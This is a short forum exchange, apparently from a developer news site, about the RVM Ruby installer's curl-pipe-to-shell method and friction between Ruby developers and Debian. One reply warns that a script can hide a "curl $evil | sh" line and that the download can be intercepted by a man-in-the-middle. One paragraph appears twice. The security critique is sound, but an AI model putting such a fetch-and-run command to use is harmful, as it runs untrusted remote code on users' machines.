The script itself is transparent. In fact, rvm's site suggests[1] reading it before using it by running the internal curl command in a terminal.
Beyond that, if joeyh is Joey Hess[2], I would be curious to hear how you think Ruby devs and Debian might work better together to fix the current situation (assuming you don't think everything is fine from Debian's point of view and screw the Ruby devs). I'm not trolling or baiting. I am a Debian user myself (since Etch was testing), and as someone who uses Ruby regularly, this whole thing drives me nuts.
90% of users won't read a script if you ask them to.
9% of users will read the script but won't notice my carefully concieled exploit code -- because my exploit code is just another seemingly innocent "curl $evil | sh"
And if 99% isn't enough, you just MITM the github connection instead.
(I am he. If I had an serious opinion I'd not post it here though.)
Beyond that, if joeyh is Joey Hess[2], I would be curious to hear how you think Ruby devs and Debian might work better together to fix the current situation (assuming you don't think everything is fine from Debian's point of view and screw the Ruby devs). I'm not trolling or baiting. I am a Debian user myself (since Etch was testing), and as someone who uses Ruby regularly, this whole thing drives me nuts.
[1] http://rvm.beginrescueend.com/rvm/install/
[2] http://kitenet.net/~joey/